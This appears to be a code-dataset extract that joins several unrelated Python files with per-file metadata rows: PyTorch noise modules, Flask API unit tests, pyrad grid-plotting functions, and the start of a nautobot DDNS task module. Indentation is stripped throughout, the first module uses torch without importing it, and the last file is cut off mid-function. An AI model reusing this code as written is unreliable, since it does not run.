import torch.nn as nn
class MultiplicativeNoise(nn.Module):
def __init__(self, sigma):
super().__init__()
self.register_buffer("sigma", torch.tensor(sigma, dtype=torch.float))
def diffusion(self, t, x):
return self.sigma * x
def dif_diffusion(self, t, x):
return self.sigma
class AdditiveNoise(nn.Module):
def __init__(self, sigma):
super().__init__()
self.register_buffer("sigma", torch.tensor(sigma, dtype=torch.float))
def diffusion(self, t, x):
return self.sigma
def dif_diffusion(self, t, x):
return 0
class NoNoise(nn.Module):
def __init__(self, sigma):
super().__init__()
def diffusion(self, t, x):
return 0.0
def dif_diffusion(self, t, x):
return 0.0
| 21.365854
| 77
| 0.633562
| 116
| 876
| 4.534483
| 0.284483
| 0.102662
| 0.159696
| 0.171103
| 0.745247
| 0.745247
| 0.739544
| 0.625475
| 0.456274
| 0.456274
| 0
| 0.007599
| 0.248858
| 876
| 40
| 78
| 21.9
| 0.791793
| 0.06621
| 0
| 0.72
| 0
| 0
| 0.01227
| 0
| 0
| 0
| 0
| 0.025
| 0
| 1
| 0.36
| false
| 0
| 0.08
| 0.24
| 0.8
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
b91609c3c89af1548156f672b5b0285d5b8af918
| 110
|
py
|
Python
|
bflib/characters/racialclass/__init__.py
|
ChrisLR/BasicDungeonRL
|
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
|
[
"MIT"
] | 3
|
2017-10-28T11:28:38.000Z
|
2018-09-12T09:47:00.000Z
|
bflib/characters/racialclass/__init__.py
|
ChrisLR/BasicDungeonRL
|
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
|
[
"MIT"
] | null | null | null |
bflib/characters/racialclass/__init__.py
|
ChrisLR/BasicDungeonRL
|
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
|
[
"MIT"
] | null | null | null |
from bflib.characters.racialclass.bugbear import Bugbear
from bflib.characters.racialclass.gnoll import Gnoll
| 36.666667
| 56
| 0.872727
| 14
| 110
| 6.857143
| 0.5
| 0.1875
| 0.395833
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.072727
| 110
| 2
| 57
| 55
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b920ece0fcbad6e7aefdcfc4880354efdd0f5bae
| 17,792
|
py
|
Python
|
apicore/tests/test_api.py
|
bozicschucky/AndelaWeek2
|
520f758bb2edf134dc275965b61f2e6defe3252f
|
[
"MIT"
] | null | null | null |
apicore/tests/test_api.py
|
bozicschucky/AndelaWeek2
|
520f758bb2edf134dc275965b61f2e6defe3252f
|
[
"MIT"
] | 1
|
2019-10-21T15:01:31.000Z
|
2019-10-21T15:01:31.000Z
|
apicore/tests/test_api.py
|
bozicschucky/AndelaWeek2
|
520f758bb2edf134dc275965b61f2e6defe3252f
|
[
"MIT"
] | 2
|
2018-10-04T02:37:29.000Z
|
2018-11-01T08:29:26.000Z
|
import unittest
import json
from apicore.app import app
from apicore.models.db import DBhandler
class APITestCase(unittest.TestCase):
"""Unit testing class for the API endpoints"""
def setUp(self):
self.app = app
self.app.config['TESTING'] = True
self.db_handler = DBhandler(host="localhost", database="",
user="postgres", password="sudo")
self.db_handler.create_table()
self.client = self.app.test_client()
self.user = {
'username': 'tester',
'password': 'password'
}
self.question = {
"author": "Tester",
"title": "I am getting errors when i run pytest",
"body": "I am having issues with the code i \
have written i need a fix for this"
}
self.token = ''
def test_user_register(self):
''' Tests whether a given user can register through the app '''
response = self.client.post('api/v2/auth/register',
data=json.dumps(self.user),
content_type='application/json'
)
self.assertEqual(response.status_code, 201)
self.assertIn('user is successfully registered', str(response.data))
def test_user_login(self):
''' Tests whether a given user can register through the app '''
response = self.client.post('api/v2/auth/register',
data=json.dumps(self.user),
content_type='application/json'
)
self.assertEqual(response.status_code, 201)
self.assertIn('user is successfully registered', str(response.data))
response = self.client.post('api/v2/auth/login',
data=json.dumps(self.user),
content_type='application/json'
)
self.assertEqual(response.status_code, 201)
self.assertIn('Token created', str(response.data))
def test_acces_endpoint_without_token(self):
''' Tests a user accesing a protected endpoint without jwt '''
res = self.client.post('/api/v2/questions',
data=json.dumps(self.question),
content_type='application/json')
self.assertEqual(res.status_code, 401)
self.assertIn('Missing Authorization Header', str(res.data))
def test_can_get_all_questions(self):
'''Test can get a question with jwt auth '''
response = self.client.post('api/v2/auth/register',
data=json.dumps(self.user),
content_type='application/json'
)
self.assertEqual(response.status_code, 201)
self.assertIn('user is successfully registered', str(response.data))
response = self.client.post('api/v2/auth/login',
data=json.dumps(self.user),
content_type='application/json'
)
self.assertEqual(response.status_code, 201)
self.assertIn('Token created', str(response.data))
login_response = response.json
self.token = login_response['access_token']
rv = self.client.get('api/v2/questions',
content_type='application/json',
headers={'Authorization':
'Bearer {}'.format(self.token)})
self.assertEqual(rv.status_code, 200)
def test_can_create_a_question(self):
'''Test can create a queston '''
response = self.client.post('api/v2/auth/register',
data=json.dumps(self.user),
content_type='application/json'
)
self.assertEqual(response.status_code, 201)
self.assertIn('user is successfully registered', str(response.data))
response = self.client.post('api/v2/auth/login',
data=json.dumps(self.user),
content_type='application/json'
)
self.assertEqual(response.status_code, 201)
self.assertIn('Token created', str(response.data))
login_response = response.json
self.token = login_response['access_token']
res = self.client.post('/api/v2/questions',
data=json.dumps(self.question),
content_type='application/json',
headers={'Authorization':
'Bearer {}'.format(self.token)})
self.assertEqual(res.status_code, 201)
def test_can_get_a_question(self):
'''Test can get a queston '''
response = self.client.post('api/v2/auth/register',
data=json.dumps(self.user),
content_type='application/json'
)
self.assertEqual(response.status_code, 201)
self.assertIn('user is successfully registered', str(response.data))
response = self.client.post('api/v2/auth/login',
data=json.dumps(self.user),
content_type='application/json'
)
self.assertEqual(response.status_code, 201)
self.assertIn('Token created', str(response.data))
login_response = response.json
self.token = login_response['access_token']
res = self.client.post('/api/v2/questions',
data=json.dumps(self.question),
content_type='application/json',
headers={'Authorization':
'Bearer {}'.format(self.token)})
self.assertEqual(res.status_code, 201)
rv = self.client.get('api/v2/questions/1',
content_type='application/json',
headers={'Authorization':
'Bearer {}'.format(self.token)})
self.assertEqual(rv.status_code, 200)
self.assertIn('I am getting errors when i run pytest', str(rv.data))
def test_can_get_many_questions(self):
'''Test can get many questons '''
question1 = {
"author": "Tester",
"title": "How do i work with JWT",
"body": "I am writing unitests and they dont work \
i need a fix for this. Thanks"
}
question2 = {
"author": "Tester",
"title": "I am facing merge conflicts",
"body": "How do i use version control and git \
to solve this. Thanks"
}
response = self.client.post('api/v2/auth/register',
data=json.dumps(self.user),
content_type='application/json'
)
self.assertEqual(response.status_code, 201)
self.assertIn('user is successfully registered',
str(response.data))
response = self.client.post('api/v2/auth/login',
data=json.dumps(self.user),
content_type='application/json'
)
self.assertEqual(response.status_code, 201)
self.assertIn('Token created', str(response.data))
login_response = response.json
self.token = login_response['access_token']
res = self.client.post('/api/v2/questions',
data=json.dumps(self.question),
content_type='application/json',
headers={'Authorization':
'Bearer {}'.format(self.token)})
self.assertEqual(res.status_code, 201)
res = self.client.post('/api/v2/questions',
data=json.dumps(self.question),
content_type='application/json',
headers={'Authorization':
'Bearer {}'.format(self.token)})
self.assertEqual(res.status_code, 201)
res = self.client.post('/api/v2/questions',
data=json.dumps(question1),
content_type='application/json',
headers={'Authorization':
'Bearer {}'.format(self.token)})
self.assertEqual(res.status_code, 201)
res = self.client.post('/api/v2/questions',
data=json.dumps(question2),
content_type='application/json',
headers={'Authorization':
'Bearer {}'.format(self.token)})
self.assertEqual(res.status_code, 201)
rv = self.client.get('api/v2/questions',
content_type='application/json',
headers={'Authorization':
'Bearer {}'.format(self.token)})
self.assertEqual(rv.status_code, 200)
self.assertIn(
'I am getting errors when i run pytest', str(rv.data))
self.assertIn('How do i work with JWT', str(rv.data))
self.assertIn('I am facing merge conflicts', str(rv.data))
def test_can_create_answer_to_question(self):
'''Test can create an answer to question '''
response = self.client.post('api/v2/auth/register',
data=json.dumps(self.user),
content_type='application/json'
)
self.assertEqual(response.status_code, 201)
self.assertIn('user is successfully registered', str(response.data))
response = self.client.post('api/v2/auth/login',
data=json.dumps(self.user),
content_type='application/json'
)
self.assertEqual(response.status_code, 201)
self.assertIn('Token created', str(response.data))
login_response = response.json
self.token = login_response['access_token']
res = self.client.post('/api/v2/questions',
data=json.dumps(self.question),
content_type='application/json',
headers={'Authorization':
'Bearer {}'.format(self.token)})
self.assertEqual(res.status_code, 201)
answer = {"body": "Use windows because its cool",
'accept_status': False}
res = self.client.post('/api/v2/questions/1/answers',
data=json.dumps(answer),
content_type='application/json',
headers={'Authorization':
'Bearer {}'.format(self.token)})
self.assertEqual(res.status_code, 201)
def test_can_get_user_profile(self):
'''Test can create an answer to question '''
response = self.client.post('api/v2/auth/register',
data=json.dumps(self.user),
content_type='application/json'
)
self.assertEqual(response.status_code, 201)
self.assertIn('user is successfully registered',
str(response.data))
response = self.client.post('api/v2/auth/login',
data=json.dumps(self.user),
content_type='application/json'
)
self.assertEqual(response.status_code, 201)
self.assertIn('Token created', str(response.data))
login_response = response.json
self.token = login_response['access_token']
res = self.client.post('/api/v2/questions',
data=json.dumps(self.question),
content_type='application/json',
headers={'Authorization':
'Bearer {}'.format(self.token)})
self.assertEqual(res.status_code, 201)
answer = {"body": "Use windows because its cool",
'accept_status': False}
res = self.client.post('/api/v2/questions/1/answers',
data=json.dumps(answer),
content_type='application/json',
headers={'Authorization':
'Bearer {}'.format(self.token)})
self.assertEqual(res.status_code, 201)
rv = self.client.get('api/v2/profile',
content_type='application/json',
headers={'Authorization':
'Bearer {}'.format(self.token)})
self.assertEqual(rv.status_code, 200)
rv_reponse = rv.json
username = rv_reponse['username']
recent = rv_reponse['recent']
self.assertEqual('tester', username)
self.assertEqual("I am getting errors when i run pytest", recent[0])
def test_can_update_answer_to_question(self):
'''Test can create an answer to question '''
response = self.client.post('api/v2/auth/register',
data=json.dumps(self.user),
content_type='application/json'
)
self.assertEqual(response.status_code, 201)
self.assertIn('user is successfully registered', str(response.data))
response = self.client.post('api/v2/auth/login',
data=json.dumps(self.user),
content_type='application/json'
)
self.assertEqual(response.status_code, 201)
self.assertIn('Token created', str(response.data))
login_response = response.json
self.token = login_response['access_token']
res = self.client.post('/api/v2/questions',
data=json.dumps(self.question),
content_type='application/json',
headers={'Authorization':
'Bearer {}'.format(self.token)})
self.assertEqual(res.status_code, 201)
answer = {"body": "Use windows because its cool",
'accept_status': False}
res = self.client.post('/api/v2/questions/1/answers',
data=json.dumps(answer),
content_type='application/json',
headers={'Authorization':
'Bearer {}'.format(self.token)})
self.assertEqual(res.status_code, 201)
answer_update = {"body": "Use windows because its cool",
'accept_status': True}
rv = self.client.put('api/v2/questions/1/answers/2',
data=json.dumps(answer_update),
content_type='application/json',
headers={'Authorization':
'Bearer {}'.format(self.token)})
self.assertEqual(rv.status_code, 200)
rv = rv.json
self.assertEqual("Answer status updated", rv['message'])
def test_delete_question(self):
''' Test can delete a question '''
response = self.client.post('api/v2/auth/register',
data=json.dumps(self.user),
content_type='application/json'
)
self.assertEqual(response.status_code, 201)
self.assertIn('user is successfully registered',
str(response.data))
response = self.client.post('api/v2/auth/login',
data=json.dumps(self.user),
content_type='application/json'
)
self.assertEqual(response.status_code, 201)
self.assertIn('Token created', str(response.data))
login_response = response.json
self.token = login_response['access_token']
res = self.client.post('/api/v2/questions',
data=json.dumps(self.question),
content_type='application/json',
headers={'Authorization':
'Bearer {}'.format(self.token)})
self.assertEqual(res.status_code, 201)
rv = self.client.delete('api/v2/questions/1',
content_type='application/json',
headers={'Authorization':
'Bearer {}'.format(self.token)})
self.assertEqual(rv.status_code, 202)
def tearDown(self):
print('-----Tearing down ------------')
self.db_handler.drop_table('users', 'answers', 'questions')
if __name__ == '__main__':
unittest.main(verbosity=2)
| 47.068783
| 76
| 0.494998
| 1,656
| 17,792
| 5.218599
| 0.095411
| 0.0729
| 0.099283
| 0.117334
| 0.866003
| 0.832909
| 0.820181
| 0.820181
| 0.808609
| 0.808609
| 0
| 0.015759
| 0.397257
| 17,792
| 377
| 77
| 47.193634
| 0.790097
| 0.026641
| 0
| 0.710692
| 0
| 0
| 0.172618
| 0.006318
| 0
| 0
| 0
| 0
| 0.207547
| 1
| 0.040881
| false
| 0.006289
| 0.012579
| 0
| 0.056604
| 0.003145
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b925f00ee06b14dc0c86f4ba1871c2bf3da3d491
| 16,970
|
py
|
Python
|
src/pyrad_proc/pyrad/graph/plots_grid.py
|
jfigui/pyrad
|
7811d593bb09a7f8a621c0e8ae3f32c2b85a0254
|
[
"BSD-3-Clause"
] | 41
|
2016-12-01T08:46:06.000Z
|
2021-06-24T21:14:33.000Z
|
src/pyrad_proc/pyrad/graph/plots_grid.py
|
jfigui/pyrad
|
7811d593bb09a7f8a621c0e8ae3f32c2b85a0254
|
[
"BSD-3-Clause"
] | 42
|
2017-02-23T14:52:49.000Z
|
2021-02-01T10:43:52.000Z
|
src/pyrad_proc/pyrad/graph/plots_grid.py
|
jfigui/pyrad
|
7811d593bb09a7f8a621c0e8ae3f32c2b85a0254
|
[
"BSD-3-Clause"
] | 21
|
2016-08-25T15:02:12.000Z
|
2021-05-27T04:09:40.000Z
|
"""
pyrad.graph.plots_grid
======================
Functions to plot data in a Cartesian grid format
.. autosummary::
:toctree: generated/
plot_surface
plot_surface_contour
plot_latitude_slice
plot_longitude_slice
plot_latlon_slice
"""
from warnings import warn
import numpy as np
try:
import cartopy
_CARTOPY_AVAILABLE = True
except ImportError:
_CARTOPY_AVAILABLE = False
import matplotlib as mpl
mpl.use('Agg')
# Increase a bit font size
mpl.rcParams.update({'font.size': 16})
mpl.rcParams.update({'font.family': "sans-serif"})
import matplotlib.pyplot as plt
import pyart
from .plots_aux import get_norm
def plot_surface(grid, field_name, level, prdcfg, fname_list, titl=None,
alpha=None, ax=None, fig=None, display=None, save_fig=True,
use_basemap=False):
"""
plots a surface from gridded data
Parameters
----------
grid : Grid object
object containing the gridded data to plot
field_name : str
name of the radar field to plot
level : int
level index
prdcfg : dict
dictionary containing the product configuration
fname_list : list of str
list of names of the files where to store the plot
titl : str
Plot title
alpha : float or None
Set the alpha transparency of the grid plot. Useful for
overplotting radar over other datasets.
ax : Axis
Axis to plot on. if fig is None a new axis will be created
fig : Figure
Figure to add the colorbar to. If none a new figure will be created
display : GridMapDisplay object
The display used
save_fig : bool
if true save the figure. If false it does not close the plot and
returns the handle to the figure
Returns
-------
fname_list : list of str or
fig, ax, display : tupple
list of names of the saved plots or handle of the figure an axes
"""
dpi = prdcfg['gridMapImageConfig'].get('dpi', 72)
vmin = prdcfg.get('vmin', None)
vmax = prdcfg.get('vmax', None)
norm, ticks, ticklabs = get_norm(field_name)
xsize = prdcfg['gridMapImageConfig']['xsize']
ysize = prdcfg['gridMapImageConfig']['ysize']
lonstep = prdcfg['gridMapImageConfig'].get('lonstep', 0.5)
latstep = prdcfg['gridMapImageConfig'].get('latstep', 0.5)
min_lon = prdcfg['gridMapImageConfig'].get('lonmin', 2.5)
max_lon = prdcfg['gridMapImageConfig'].get('lonmax', 12.5)
min_lat = prdcfg['gridMapImageConfig'].get('latmin', 43.5)
max_lat = prdcfg['gridMapImageConfig'].get('latmax', 49.5)
lon_lines = np.arange(np.floor(min_lon), np.ceil(max_lon)+1, lonstep)
lat_lines = np.arange(np.floor(min_lat), np.ceil(max_lat)+1, latstep)
if fig is None:
fig = plt.figure(figsize=[xsize, ysize], dpi=dpi)
ax = fig.add_subplot(111)
if use_basemap:
resolution = prdcfg['gridMapImageConfig'].get('mapres', 'l')
if resolution not in ('c', 'l', 'i', 'h', 'f'):
warn('Unknown map resolution: '+resolution)
resolution = 'l'
if resolution == 'c':
area_thresh = 10000
elif resolution == 'l':
area_thresh = 1000
elif resolution == 'i':
area_thresh = 100
elif resolution == 'h':
area_thresh = 10
elif resolution == 'f':
area_thresh = 1
display = pyart.graph.GridMapDisplayBasemap(grid)
display.plot_basemap(
lat_lines=lat_lines, lon_lines=lon_lines,
resolution=resolution, area_thresh=area_thresh,
auto_range=False, min_lon=min_lon, max_lon=max_lon,
min_lat=min_lat, max_lat=max_lat, ax=ax)
display.plot_grid(
field_name, level=level, norm=norm, ticks=ticks, title=titl,
ticklabs=ticklabs, vmin=vmin, vmax=vmax, alpha=alpha, ax=ax,
fig=fig)
else:
resolution = prdcfg['gridMapImageConfig'].get('mapres', '110m')
# Map from basemap to cartopy notation
if resolution == 'l':
resolution = '110m'
elif resolution == 'i':
resolution = '50m'
elif resolution == 'h':
resolution = '10m'
if resolution not in ('110m', '50m', '10m'):
warn('Unknown map resolution: '+resolution)
resolution = '110m'
background_zoom = prdcfg['gridMapImageConfig'].get(
'background_zoom', 8)
display = pyart.graph.GridMapDisplay(grid)
fig, ax = display.plot_grid(
field_name, level=level, norm=norm, ticks=ticks,
ticklabs=ticklabs, resolution=resolution,
background_zoom=background_zoom, lat_lines=lat_lines,
lon_lines=lon_lines,
maps_list=prdcfg['gridMapImageConfig']['maps'],
vmin=vmin, vmax=vmax, alpha=alpha, title=titl, ax=ax, fig=fig)
ax.set_extent([min_lon, max_lon, min_lat, max_lat])
# display.plot_crosshairs(lon=lon, lat=lat)
else:
if use_basemap:
display.plot_grid(
field_name, level=level, norm=norm, ticks=ticks,
lat_lines=lat_lines, lon_lines=lon_lines, title=titl,
ticklabs=ticklabs, colorbar_flag=False, vmin=vmin, vmax=vmax,
alpha=alpha, ax=ax, fig=fig)
else:
fig, ax = display.plot_grid(
field_name, level=level, norm=norm, ticks=ticks,
lat_lines=lat_lines, lon_lines=lon_lines, ticklabs=ticklabs,
colorbar_flag=False, embelish=False, vmin=vmin, vmax=vmax,
alpha=alpha, title=titl, ax=ax, fig=fig)
if save_fig:
for fname in fname_list:
fig.savefig(fname, dpi=dpi)
plt.close(fig)
return fname_list
return (fig, ax, display)
def plot_surface_contour(grid, field_name, level, prdcfg, fname_list,
contour_values=None, linewidths=1.5, colors='k',
ax=None, fig=None, display=None, save_fig=True,
use_basemap=False):
"""
plots a contour plot from gridded data
Parameters
----------
grid : Grid object
object containing the gridded data to plot
field_name : str
name of the radar field to plot
level : int
level index
prdcfg : dict
dictionary containing the product configuration
fname_list : list of str
list of names of the files where to store the plot
contour_values : float array
list of contours to plot
linewidths : float
width of the contour lines
colors : color string or sequence of colors
The contour colours
ax : Axis
Axis to plot on. if fig is None a new axis will be created
fig : Figure
Figure to add the colorbar to. If none a new figure will be created
display : GridMapDisplay object
The display used
save_fig : bool
if true save the figure if false it does not close the plot and
returns the handle to the figure
use_basemap : Bool
If true uses basemap, otherwise uses cartopy.
Returns
-------
fname_list : list of str or
fig, ax : tupple
list of names of the saved plots or handle of the figure an axes
"""
# get contour intervals
if contour_values is None:
field_dict = pyart.config.get_metadata(field_name)
if 'boundaries' in field_dict:
vmin = field_dict['boundaries'][0]
vmax = field_dict['boundaries'][-1]
num = len(field_dict['boundaries'])
else:
vmin, vmax = pyart.config.get_field_limits(field_name)
num = 10
contour_values = np.linspace(vmin, vmax, num=num)
dpi = prdcfg['gridMapImageConfig'].get('dpi', 72)
if fig is None:
xsize = prdcfg['gridMapImageConfig']['xsize']
ysize = prdcfg['gridMapImageConfig']['ysize']
lonstep = prdcfg['gridMapImageConfig'].get('lonstep', 0.5)
latstep = prdcfg['gridMapImageConfig'].get('latstep', 0.5)
min_lon = prdcfg['gridMapImageConfig'].get('lonmin', 2.5)
max_lon = prdcfg['gridMapImageConfig'].get('lonmax', 12.5)
min_lat = prdcfg['gridMapImageConfig'].get('latmin', 43.5)
max_lat = prdcfg['gridMapImageConfig'].get('latmax', 49.5)
lon_lines = np.arange(np.floor(min_lon), np.ceil(max_lon)+1, lonstep)
lat_lines = np.arange(np.floor(min_lat), np.ceil(max_lat)+1, latstep)
fig = plt.figure(figsize=[xsize, ysize], dpi=dpi)
ax = fig.add_subplot(111)
if use_basemap or not _CARTOPY_AVAILABLE:
resolution = prdcfg['gridMapImageConfig'].get('mapres', 'l')
if resolution not in ('c', 'l', 'i', 'h', 'f'):
warn('Unknown map resolution: '+resolution)
resolution = 'l'
if resolution == 'c':
area_thresh = 10000
elif resolution == 'l':
area_thresh = 1000
elif resolution == 'i':
area_thresh = 100
elif resolution == 'h':
area_thresh = 10
elif resolution == 'f':
area_thresh = 1
display = pyart.graph.GridMapDisplayBasemap(grid)
display.plot_basemap(
lat_lines=lat_lines, lon_lines=lon_lines,
resolution=resolution, auto_range=False,
area_thresh=area_thresh, min_lon=min_lon, max_lon=max_lon,
min_lat=min_lat, max_lat=max_lat, ax=ax)
lons, lats = grid.get_point_longitude_latitude(edges=False)
data = grid.fields[field_name]['data'][level, :, :]
basemap = display.get_basemap()
basemap.contour(
lons, lats, data, contour_values, colors=colors,
linewidths=linewidths, latlon=True)
ax.set_title(display.generate_grid_title(field_name, level))
else:
resolution = prdcfg['gridMapImageConfig'].get('mapres', '110m')
# Map from basemap to cartopy notation
if resolution == 'l':
resolution = '110m'
elif resolution == 'i':
resolution = '50m'
elif resolution == 'h':
resolution = '10m'
if resolution not in ('110m', '50m', '10m'):
warn('Unknown map resolution: '+resolution)
resolution = '110m'
background_zoom = prdcfg['gridMapImageConfig'].get(
'background_zoom', 8)
display = pyart.graph.GridMapDisplay(grid)
fig, ax = display.plot_grid_contour(
field_name, level=level, ax=ax, fig=fig, lat_lines=lat_lines,
lon_lines=lon_lines, contour_values=contour_values,
linewidths=linewidths, colors=colors, resolution=resolution,
background_zoom=background_zoom,
maps_list=prdcfg['gridMapImageConfig']['maps'])
else:
if use_basemap or not _CARTOPY_AVAILABLE:
lons, lats = grid.get_point_longitude_latitude(edges=False)
data = grid.fields[field_name]['data'][level, :, :]
basemap = display.get_basemap()
basemap.contour(
lons, lats, data, contour_values, colors=colors,
linewidths=linewidths, latlon=True)
else:
lons, lats = grid.get_point_longitude_latitude(edges=False)
data = grid.fields[field_name]['data'][level, :, :]
ax.contour(
lons, lats, data, contour_values, colors=colors,
linewidths=linewidths, transform=cartopy.crs.PlateCarree())
ax.set_extent([min_lon, max_lon, min_lat, max_lat])
if save_fig:
for fname in fname_list:
fig.savefig(fname, dpi=dpi)
plt.close(fig)
return fname_list
return (fig, ax)
def plot_latitude_slice(grid, field_name, lon, lat, prdcfg, fname_list):
"""
plots a latitude slice from gridded data
Parameters
----------
grid : Grid object
object containing the gridded data to plot
field_name : str
name of the radar field to plot
lon, lat : float
coordinates of the slice to plot
prdcfg : dict
dictionary containing the product configuration
fname_list : list of str
list of names of the files where to store the plot
Returns
-------
fname_list : list of str
list of names of the created plots
"""
dpi = 72
if 'dpi' in prdcfg['rhiImageConfig']:
dpi = prdcfg['rhiImageConfig']['dpi']
norm, ticks, ticklabs = get_norm(field_name)
xsize = prdcfg['rhiImageConfig'].get('xsize', 10.)
ysize = prdcfg['rhiImageConfig'].get('ysize', 5.)
xmin = prdcfg['rhiImageConfig'].get('xmin', None)
xmax = prdcfg['rhiImageConfig'].get('xmax', None)
ymin = prdcfg['rhiImageConfig'].get('ymin', None)
ymax = prdcfg['rhiImageConfig'].get('ymax', None)
fig = plt.figure(figsize=[xsize, ysize], dpi=dpi)
ax = fig.add_subplot(111, aspect='equal')
display = pyart.graph.GridMapDisplay(grid)
display.plot_latitude_slice(
field_name, lon=lon, lat=lat, norm=norm, colorbar_orient='horizontal',
ticks=ticks, ticklabs=ticklabs, ax=ax, fig=fig)
ax.set_xlim([xmin, xmax])
ax.set_ylim([ymin, ymax])
for fname in fname_list:
fig.savefig(fname, dpi=dpi)
plt.close(fig)
def plot_longitude_slice(grid, field_name, lon, lat, prdcfg, fname_list):
"""
plots a longitude slice from gridded data
Parameters
----------
grid : Grid object
object containing the gridded data to plot
field_name : str
name of the radar field to plot
lon, lat : float
coordinates of the slice to plot
prdcfg : dict
dictionary containing the product configuration
fname_list : list of str
list of names of the files where to store the plot
Returns
-------
fname_list : list of str
list of names of the created plots
"""
dpi = 72
if 'dpi' in prdcfg['rhiImageConfig']:
dpi = prdcfg['rhiImageConfig']['dpi']
norm, ticks, ticklabs = get_norm(field_name)
xsize = prdcfg['rhiImageConfig'].get('xsize', 10.)
ysize = prdcfg['rhiImageConfig'].get('ysize', 5.)
xmin = prdcfg['rhiImageConfig'].get('xmin', None)
xmax = prdcfg['rhiImageConfig'].get('xmax', None)
ymin = prdcfg['rhiImageConfig'].get('ymin', None)
ymax = prdcfg['rhiImageConfig'].get('ymax', None)
fig = plt.figure(figsize=[xsize, ysize], dpi=dpi)
ax = fig.add_subplot(111, aspect='equal')
display = pyart.graph.GridMapDisplay(grid)
display.plot_longitude_slice(
field_name, lon=lon, lat=lat, norm=norm, colorbar_orient='horizontal',
ticks=ticks, ticklabs=ticklabs, ax=ax, fig=fig)
ax.set_xlim([xmin, xmax])
ax.set_ylim([ymin, ymax])
for fname in fname_list:
fig.savefig(fname, dpi=dpi)
plt.close(fig)
def plot_latlon_slice(grid, field_name, coord1, coord2, prdcfg, fname_list):
"""
plots a croos section crossing two points in the grid
Parameters
----------
grid : Grid object
object containing the gridded data to plot
field_name : str
name of the radar field to plot
coord1 : tupple of floats
lat, lon of the first point
coord2 : tupple of floats
lat, lon of the second point
fname_list : list of str
list of names of the files where to store the plot
Returns
-------
fname_list : list of str
list of names of the created plots
"""
dpi = 72
if 'dpi' in prdcfg['rhiImageConfig']:
dpi = prdcfg['rhiImageConfig']['dpi']
norm, ticks, ticklabs = get_norm(field_name)
xsize = prdcfg['rhiImageConfig'].get('xsize', 10.)
ysize = prdcfg['rhiImageConfig'].get('ysize', 5.)
# xmin = prdcfg['rhiImageConfig'].get('xmin', None)
# xmax = prdcfg['rhiImageConfig'].get('xmax', None)
# ymin = prdcfg['rhiImageConfig'].get('ymin', None)
# ymax = prdcfg['rhiImageConfig'].get('ymax', None)
fig = plt.figure(figsize=[xsize, ysize], dpi=dpi)
ax = fig.add_subplot(111, aspect='equal')
display = pyart.graph.GridMapDisplay(grid)
display.plot_latlon_slice(
field_name, coord1=coord1, coord2=coord2, norm=norm,
colorbar_orient='vertical', ticks=ticks, ticklabs=ticklabs, fig=fig,
ax=ax)
# ax.set_ylim(
# [prdcfg['rhiImageConfig']['ymin'], prdcfg['rhiImageConfig']['ymax']])
for fname in fname_list:
fig.savefig(fname, dpi=dpi)
plt.close(fig)
| 34.77459
| 78
| 0.604243
| 2,080
| 16,970
| 4.808173
| 0.117308
| 0.025197
| 0.053995
| 0.014999
| 0.812419
| 0.79702
| 0.780422
| 0.762424
| 0.756024
| 0.746325
| 0
| 0.012911
| 0.287979
| 16,970
| 487
| 79
| 34.845996
| 0.814781
| 0.244196
| 0
| 0.736434
| 1
| 0
| 0.106802
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01938
| false
| 0
| 0.031008
| 0
| 0.065891
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b9492109c95f7adf7b561b2bb0cc2e2ad1960312
| 6,953
|
py
|
Python
|
nautobot_ddns/background_tasks.py
|
jakubjastrabik/nautobot_DDNS
|
6067430001e7b325c8c85ac2fe207899bad141d2
|
[
"Apache-2.0"
] | 3
|
2021-11-14T23:47:19.000Z
|
2022-01-25T18:37:07.000Z
|
nautobot_ddns/background_tasks.py
|
jakubjastrabik/nautobot_DDNS
|
6067430001e7b325c8c85ac2fe207899bad141d2
|
[
"Apache-2.0"
] | null | null | null |
nautobot_ddns/background_tasks.py
|
jakubjastrabik/nautobot_DDNS
|
6067430001e7b325c8c85ac2fe207899bad141d2
|
[
"Apache-2.0"
] | 1
|
2021-11-14T23:47:22.000Z
|
2021-11-14T23:47:22.000Z
|
import logging
from typing import List, Optional
import dns.query
import dns.rdatatype
import dns.resolver
from django.db import IntegrityError
from django_rq import job
from dns import rcode
from netaddr import ip
from nautobot_ddns.models import ACTION_CREATE, ACTION_DELETE, DNSStatus, RCODE_NO_ZONE, ReverseZone, Zone
from nautobot_ddns.utils import get_soa
logger = logging.getLogger('nautobot_ddns')
def status_update(output: List[str], operation: str, response) -> None:
code = response.rcode()
if code == dns.rcode.NOERROR:
message = f"{operation} successful"
logger.info(message)
else:
message = f"{operation} failed: {dns.rcode.to_text(code)}"
logger.error(message)
output.append(message)
def create_forward(dns_name: str, address: ip.IPAddress, status: Optional[DNSStatus], output: List[str]):
if status:
status.forward_action = ACTION_CREATE
zone = Zone.objects.find_for_dns_name(dns_name)
if zone:
logger.debug(f"Found zone {zone.name} for {dns_name}")
